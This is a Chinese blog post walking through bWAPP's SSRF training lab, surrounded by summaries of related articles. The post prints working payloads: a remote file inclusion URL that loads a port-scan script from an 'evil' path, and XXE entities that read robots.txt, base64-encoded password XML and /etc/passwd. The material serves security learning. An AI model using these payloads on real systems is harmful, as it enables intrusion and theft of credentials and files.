利用bWAPP学习SSRF

最新推荐文章于 2022-03-24 08:53:17 发布
最新推荐文章于 2022-03-24 08:53:17 发布
阅读量2.5k 收藏 6
点赞数 1
分类专栏: # WEB安全 # 靶场通关 文章标签: SSRF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/syy0201/article/details/89197310
版权

在这里插入图片描述
SSRF的3个小实验

bWAPP中的SSRF给出了3个小实验来说明SSRF的利用场景:

任务1:使用远程文件包含进行端口扫描(内网探测)

任务2:使用XXE获取敏感文件中的内容(文件读取)

任务3:使用XXE进行SmartTV的拒绝服务漏洞的利用(漏洞利用)

任务1:使用远程文件包含进行端口扫描
点击任务1中的Port scan可以获得一份端口扫描的攻击脚本:http://192.168.163.157/evil/ssrf-1.txt
接下来就是利用bWAPP中的远程文件包含漏洞,执行端口扫描的脚本。
在Choose your bug中选择Remote & Local File Inclusion (RFI/LFI)security level选择low,然后点击Hack。
观察Get请求中的参数,发现是典型文件包含问题,language=lang_en.php
payload:?language=http://xxx.xxx.xxx/evil/ssrf-1.txt&action=go
POST:ip=xxxx
在这里插入图片描述

任务2:使用XXE获取敏感文件中的内容
点击Access获取XXE的利用脚本:10.158.131.81/bWAPP_latest/evil/ssrf-2.txt
然后切换到XXE漏洞利用环境,点击Anybugs?,抓包
在这里插入图片描述
将选中模块更改为下面的XML代码:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY bWAPP SYSTEM "http://localhost/bWAPP_latest/bWAPP/robots.txt">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>

使用http协议获取/bWAPP/robots.txt的内容
在这里插入图片描述
使用php协议获取/bWAPP/passwords/heroes.xml中的经过base64编码的数据

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY bWAPP SYSTEM "php://filter/read=convert.base64-encode/resource=http://localhost/bWAPP/passwords/heroes.xml">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>

在这里插入图片描述
使用file协议获取bWAPP本机的/etc/passwd的内容。
在这里插入图片描述
不知道什么原因。。。

任务3:使用XXE进行SmartTV的拒绝服务漏洞的利用(没有演示环境)

0nc3
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
bWAPP靶场实战
Kevin's Blog
05-15 2854
文章目录一、靶场介绍二、靶场搭建2.1 安装类型2.2 独立安装三、漏洞实战SSRF远程文件包含端口扫描 一、靶场介绍   集成了超过100余个网络漏洞,php web漏洞靶场,能够调制漏洞难度等级(低->中->高)。 二、靶场搭建 下载:https://sourceforge.net/projects/bwapp/ 2.1 安装类型 搭建类型有两种:(虚拟机版本可测试测漏洞类型更多,比如破壳、心脏滴血) 独立安装(部署到apache + php +mysql环境下) 虚拟机安装(bee
SSRF原理及bwapp小案例
m0_51822230的博客
04-14 565
原理 ssrf(Server-Side Request Forgery:服务器端请求伪造)是通过由攻击者构造由服务端发送请求的漏洞。 漏洞危害 漏洞利用利用方法 修复方案 bwapp ssrf 可以看到我们这里有3个实验 1.文件包含进行端口扫描 2.xxe获取敏感内容 文件包含进行端口扫描 我们先来看一看端口扫描的源代码 <?php /* bWAPP, or a buggy web application, is a free and open source deliberately ins
我的再造学习篇Day2-SSRF剖析
weixin_44866139的博客
04-03 375
一、SSRF漏洞介绍 1.1 SSRF简介 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种利用漏洞伪造服务器端发起请求。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 1.2 漏洞出现点 通过url 地址分享文章,例如如下地址: http://share.xxx.com/index.php?url=http://127.0.0.1 ...
利用pikachu和bwapp学习SSRF
weixin_51693574的博客
12-25 454
利用pikachu和bwapp学习SSRF 1.pikachu上学习ssrf
BWAPP:一款非常好用的漏洞演示平台
公众号shadow sock7
06-14 5146
参考: http://www.freebuf.com/sectool/76885.html https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
E049-论坛漏洞分析及利用-针对bwapp进行web渗透测试的探索.pdf
12-02
E049-论坛漏洞分析及利用-针对bwapp进行web渗透测试的探索
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
第三节 SSRF利用 - 内网资源访问-01
最新发布
09-15
"第三节 SSRF利用 - 内网资源访问-01" 本节课程主要讲解了SSRF漏洞的_php_函数,包括file_get_contents、fsockopen()和curl_exec()三个函数的使用和可能存在的漏洞。 SSRF漏洞的定义 SSRF漏洞全称为Server-side ...
SSRF和XXE漏洞介绍
qq_41814777的博客
06-19 568
前沿:介绍一个开源的渗透测试平台vulhub 笔记:webLogic 从SSRF到redis未授权访问到getshell(不需要用户名和密码访问redis数据库,读写文件) SSRF介绍: SSRF(Server-Side Request Forgery),服务器端请求伪造,利用漏洞伪造服务器端发起请求,从而突破客户端访问不到的数据。 通常是这样的:客户端请求一个正常的url资源,服务端新建一个文本文件把资源内容写入到该文本,然后保存,最后读取再输出。 SSRF漏洞危害: 访问服务端敏感文件,造成数据泄露
渗透测试之SSRF服务器端请求伪造漏洞
weixin_45380284的博客
03-06 565
SSRF服务器端请求伪造漏洞 原理: SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人) SSRF 形成的原因 大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档,等等。 原理简析: S
bWAPP靶场之PHP Code Injection
0nc3的博客
04-04 886
0x00 PHP Code Injection 核心代码: <?php if(isset($_REQUEST["message"])) { // If the security level is not MEDIUM or HIGH if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level...
SSRF(Server-Side Request Forgery):服务器端请求伪造
打代码的小女孩
12-23 1626
0X00 SSRF介绍 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限...
安装 bWAPP 漏洞环境
weixin_43148062的博客
04-24 992
bWAPP 简介 安装 bWAPP漏洞环境 一、bWAPP 简介 bWAPP 是一款非常好的漏洞演示平台,其包含有100多个漏洞。 bWAPP 下载地址 回到顶部 二、安装 bWAPP漏洞环境 回到顶部 知乎:叄贰壹 简书:带只拖鞋去流浪 关注我,带你一起写bug warning :未经授权,不得转载 有问题的...
XXE漏洞原理和案例实验演示;ssrf漏洞原理和实验案例演示
qq_44696653的博客
06-03 806
一、XXE漏洞原理和案例实验演示 XXE(xml external entity -injection“) 1.XML xml是一种可扩展的标记语言,可用来存储数据、传输数据 XML格式: 第二部分:DTD DTD:Document Type Defintion 文档类型定义,用来为XML文档定义语义约束。来约束XML文档格式。DTD中不同类型: DTD外部实体举例: 外部引用可以支持htt...
跟bWAPP学WEB安全(PHP代码)--SSL(Server-Side-Include)漏洞
weixin_30783913的博客
01-09 179
什么是Server-Side-Include漏洞 服务端包含漏洞是指发送指令到服务器,服务器会将指令运行完,把运行结果包含在返回文件中发送给你。利用这种漏洞可以获取服务端的信息甚至执行命令,这样的指令是构造在HTML注释中发过去的。当然,因为包含SSI指令的文件要求特殊处理,所以必须为所有SSI文件赋予 SSI文件扩展名。默认扩展名是 .stm、.shtm和 .shtml。 指令类型 显示服...
复现bwapp逻辑漏洞-验证机制问题-一.利用Burp Suite中Intruder模块进行字典攻击
weixin_53872203的博客
03-24 579
本文章仅供分享学习参考使用!!! low: 1.随便输入用户和密码,进行抓包,利用字典进行暴力破解 集束炸弹模式,每个位置单独设置payload,尝试使用所有组合 只要时间充足,字典强大,一般暴力破解没什么问题!!! Medium:无效的防重放措施 说明:在Medium中,比low多了一个salt字段,使得前端在每次发送时,增加了一个随机的salt字段,用来防止数据包重放,这样Intruder模块就失效了。 1.基于low暴力破解的用户名和密码随意输入用户名和密码,抓包,发现多出...
8.bwapp亲测xxe漏洞
weixin_30725315的博客
09-11 1034
这几天在学习XXE漏洞,这里用靶机bwapp来练习一下这个漏洞,重在学习 xxe漏洞主要针对webservice危险的引用的外部实体并且未对外部实体进行敏感字符的过滤, 从而可以造成命令执行,目录遍历等.首先存在漏洞的web服务一定是存在xml传输数据的, 可以在http头的content-type中查看,也可以根据url一些常见的关键字进行判断测试,例如 wsdl(web服务描述语言)。...
学习ssrf相关的知识体系
04-27
好的,关于学习SSRF(Server-Side Request Forgery)相关的知识体系,我可以给你一些建议: 1. 理解SSRF的概念和原理:SSRF是指攻击者利用服务器端应用程序的漏洞,构造恶意请求,从而在未经授权的情况下访问和攻击内部系统。要深入了解SSRF,首先需要理解它的概念和原理。 2. 学习SSRF的攻击方式和技术:攻击者可以利用SSRF漏洞进行多种攻击,如访问内部系统、执行任意命令等。学习SSRF的攻击方式和技术可以帮助你更好地理解和应对SSRF攻击。 3. 掌握SSRF的检测和修复方法:要有效地防御SSRF攻击,需要掌握SSRF的检测和修复方法。这包括对应用程序的漏洞扫描、安全配置和代码审计等方面的掌握。 4. 学习SSRF相关的工具和框架:有很多工具和框架可以帮助你发现和修复SSRF漏洞,如Burp Suite、OWASP ZAP、Netsparker等。学习和熟练使用这些工具和框架可以提高你的SSRF漏洞检测和修复能力。 希望这些建议可以帮助你更好地学习SSRF相关的知识。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值